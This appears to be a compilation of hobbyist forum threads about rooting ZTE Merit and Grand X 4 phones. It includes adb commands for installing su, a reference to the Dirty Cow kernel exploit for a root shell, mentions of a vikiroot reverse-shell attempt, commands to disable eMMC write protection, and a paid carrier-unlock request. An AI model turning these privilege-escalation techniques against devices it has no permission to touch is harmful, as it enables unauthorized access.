I was wondering if there's any accomplished phone rooters in the NC area that would be willing to walk me through this or do this for me
I'd be more than willing to make a donation to make this happen,
custom recovery
I was wondering if someone would make q custom recovery for this phone because the stock recovery is really bad
Not working
I can't even get past step 2, I have the file installed and unzipped on both my computer and my smart phone. The only thing I can find to put in the codes is command prompt which says "error: device not found" when I type in adb shell. My ZTE Merit phone has very low internal memory due to all the retarded system apps that came on the phone, I would very much like some assistance removing them from my phone. I also downloaded superuser elite onto my phone and it doesn't show up with ANYTHING. The first page says
superuse v3.1.3(46)
tap to display changelog
elite installed
su binary not found
a check in the box "outdated binary notification
unchecked box, temp unroot (When tapped it does nothing)
unchecked box ota survival (Again when tapped it does nothing)
I scroll over to the apps section of the program and it says "No apps in list"
What am I doing wrong? This lack of space is quite irritating
Worked!
omg I've wanted to root my phone. Thank you thank you! I thought I would brick my phone at first.
SIM Carrier unlock a ZTE Merit Z990G Straight Talk
I'm currently a T mobile prepaid customer and received the Merit from a friend of mine for doing some painting. I have looked for a month now and had a few unlock websites fail at attempting to unlock the phone via the IMEI (which the phone does have ). I have attempted to put my tmobile sim in the Merit but there is NO place to enter an unlock code. I really DONT wanna change my service to straight talk and would be willing to pay a decent amount to anyone that is capable of unlocking this phone for use with tmobile. If you think you have what it takes PM me and i will give you the IMEI and we can work out a deal. I challenge ANYONE achieve the impossible and get me the unlock code and a way to input it into the phone.
Cannot get local.prop
I have waited 20 minutes after trying to create the local.prop file and it simply won't create it. Any suggestions?
Can't get SU to upload
Hey I'm new to rooting android. I get to the point of installing SU but windows keeps telling me file not found. Would really like some help in fixing this issue. I have installed SU file to C:\Android\android-sdk\SU. Up to this point everything works fine.
adb push su /system/xbin/su
adb shell chown 0.0 /system/xbin/su
adb shell chmod 06755 /system/xbin/su
Any help would be really appreciated.
Thnks
Help getting Started
Hey Anyone and everyone that may be online, I have a real quick and probably REALLY EASY question for ya... I'm trying to get started Rooting my ZTE Merit and I need to find out how to get to or where to find the screen where I type in the commands. I already downloaded the chainsdd zip file. So now I'm supposed to get shell with adb. If someone would be so kind and put me in the right general direction, I sure would
be grateful.
Thanks in advance,
Jason
Not a Damn thing...
Rather sad....I have everything going as it should....all input correct...still no root after final reboot...I followed every step to a T several times -rw-rw-rw- grrr...ive rooted many devices none this big of a pain in tha butt!
Used updated su binary on root just for fun...same result
Help plz!
im a noob to this but have been messing around with ubuntu for some time now can someone show me step by step on how to root my zte merit plz? is there a video tut on how? i tried all the quick methods but they don't work, this one obviously does on this page, can someone help start me out plz, im learning still and love to learn more!
---------- Post added at 08:59 AM ---------- Previous post was at 08:45 AM ----------
Univarseman said:
I can't even get past step 2, I have the file installed and unzipped on both my computer and my smart phone. The only thing I can find to put in the codes is command prompt which says "error: device not found" when I type in adb shell. My ZTE Merit phone has very low internal memory due to all the retarded system apps that came on the phone, I would very much like some assistance removing them from my phone. I also downloaded superuser elite onto my phone and it doesn't show up with ANYTHING. The first page says
superuse v3.1.3(46)
tap to display changelog
elite installed
su binary not found
a check in the box "outdated binary notification
unchecked box, temp unroot (When tapped it does nothing)
unchecked box ota survival (Again when tapped it does nothing)
I scroll over to the apps section of the program and it says "No apps in list"
What am I doing wrong? This lack of space is quite irritating
Click to expand...
Click to collapse
help me, whats the first step then i can get the gearz in motion, i have not a clue on how to start this but if i do i can usually figure it out from them sometimes
Start menu
jjflappy said:
Hey Anyone and everyone that may be online, I have a real quick and probably REALLY EASY question for ya... I'm trying to get started Rooting my ZTE Merit and I need to find out how to get to or where to find the screen where I type in the commands. I already downloaded the chainsdd zip file. So now I'm supposed to get shell with adb. If someone would be so kind and put me in the right general direction, I sure would
be grateful.
Thanks in advance,
Jason
Click to expand...
Click to collapse
Start menu then type CMD hit enter
This thread is made in an effort to root the ZTE Grand X 4 (Z957). At this point I've made some progress by using the Dirty Cow exploit to access a root shell via ADB, but have been unable to install su to the system partition.
Notes: stock rom, no custom recovery.
Exploit method:
Follow the instructions posted by Arinerron on GitHub regarding CVE-2016-5195 (under 10 posts, cannot share direct link)
When successful you will see "[email protected]:/ #" as your shell prompt, however the session will hang after any command. That said, /system/run-as is still updated allowing you to do the following:
$ adb shell
[email protected]:/ $ run-as
uid run-as 2000
uid 0
0 u:r:runas:s0
context 0 u:r:shell:s0
[email protected]:/ # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:shell:s0
you have access to the android system as root within this shell, but this is where I'm getting stuck. I'm not able to find a way to mount the system partition as read/write, and as such unable to install su. Also note that you will need to run the exploit again anytime you reboot the device. I have tried the following methods:
$ adb shell cp /sdcard/Download/su /system/bin/su
cp: /system/bin/su: Read-only file system
[email protected]:/ # mount -o rw,remount /system
mount: Permission denied
adb reboot disemmcwp
#still unable to remount the system partition
At this point I'll share what I've been able to do so far and see if anyone else has ideas for a next step.
Have you figured out how to root the z957.
This worked on my ZTE GrandX Max Plus to permanently disable the write protection on the system partition.
Good luck!!
reboot disemmcwp
If you ever want to re-enable being blocked from mounting system rw:
reboot emmcwpenab
Any luck on this root? I am looking to buy a phone on Cricket, but I need one that I can root.
Bump? Would love to see root here!
Bump, I've tried but I also get stuck on the same three methods:
$ adb shell cp /sdcard/Download/su /system/bin/su
cp: /system/bin/su: Read-only file system
[email protected]:/ # mount -o rw,remount /system
mount: Permission denied
adb reboot disemmcwp
#still unable to remount the system partition
Grand X 4
has anyone successfully rooted the grand x ?!
Thought I would post an update: Still no success on my end.
"Rooting" is easy, but breaking out of the selinux context to do anything is hard. ie. I expanded on timwr/CVE-2016-5195 by trying to use vikiroot to break out of the u:r:shell:s0 context. To do this adb push the vikiroot exploit to /data/local/tmp and then use the timwr method to run that exploit as root:
[email protected]:/ # /data/local/tmp/exploit
Unfortunately I could only get the reverse shell to work as a glorified echo. If anyone knows where I could find some c++ code for running a shell in android for me to work off of I'm willing to see how much further I can get in that direction.
As disemmcwp doesn't work I'm wondering if ZTE found a different way to lock down the system partition? Interestingly there is an OEM-specific settings button that is greyed out (find it at *#*#4636#*#*).
I'm running firmware from Wind/Freedom Mobile so I can access the bootloader and unlock it, but I can't install SU or anything from stock. Additionally, there is no TWRP released for this phone yet. I have no idea where to find the board config files for this phone. Without a custom bootloader I'm not sure how to make permanent changes to the rom at this point.
Thanks for your work on this. Stock Rom is pretty clean, but root would be great on this.
I've tried many different ways to root this phone. For weeks, I've tried. Nothing. I personally think that there is no way to, not now at least.
Don't know if this will help but, I found that they lock the bootloader under the developer settings!
Has anyone tried a one click root application like KingoRoot ?
Or is this more for doing it on your own without a service like that?
Previously I had tried a series of one click solutions but I haven't found any that support this device yet. Typically they use the same exploits we've tried to use the hard way
After slacking for awhile I was finally able to poke around some of the internals of the phone in FTM mode using qualcomm developer tools. Lots of nifty things in the embedded file system and plenty of opportunities to flash new boot loaders and roms to the device for those of you who have a locked bootloader, but unfortunately I haven't been able to extract a copy of the stock rom or bootloaders. I'm still lacking the information I need to compile a new one for the phone.
Where I stand:
Can create a root shell, cannot remount system as read/write for permanent root in stock rom.
Can install new boot loader, no twrp or other found for this hardware.
Can compile new twrp, no boardconfig files (handy to avoid bricking your phone)
Can explore EFS and access chip via FTM, not sure how or if possible to download current rom / bootloader from here.
Happy for any tips on what to try next!
Can you tell me which tools you used? I looked at the Qualcomm site and there are plenty to choose from.
If you can get those tools off of the site maybe I'll message you about grabbing a few items on my Christmas list! QPST includes the tools necessary, and the tools to backup the 425 should you accidentally brick your phone (basically impossible to truly brick a qualcomm if you have the right tools). Archive.org has a copy, don't remember where to find the driver pack but you'll need that too (and a windows build).
Read through some notes on marshmellow and sounds like you have to remount system from recovery. I'm camping for the next month but will try talking to the TWRP team about porting a bootloader to the phone when I get back.
Let me know if you make any headway!
try this adb command and see if you get a qualcomm serial port after reboot
Code:
adb reboot edl
if that doesnt work try
Code:
adb reboot bootloader
then run the attached
How did you get into diag mode? Just do the temp root method and setprop sys.usb.config diag,adb?
https://freeandroidroot.com/root-zte-grand-x-4/
This page claims to have a root method but does it actually work? I've tried twice with no success.
How's everyone here? I also am awaiting root for this device. It really needs some shine on it's mid levelness. So here is my friend's zte warp 7 work for root. He also got some killer roms for the Huawei ascend XT. He does great work. I'm sure if he had a grand x 4 he could move this along. Just a suggestion. This man can this done. Just a suggestion for all of us. https://forum.xda-developers.com/showpost.php?p=72560392&postcount=246
---------- Post added at 11:31 PM ---------- Previous post was at 11:10 PM ----------
https://forum.xda-developers.com/member.php?u=7934375
Anyone root this phone yet?
Sent from my Z956 using XDA-Developers Legacy app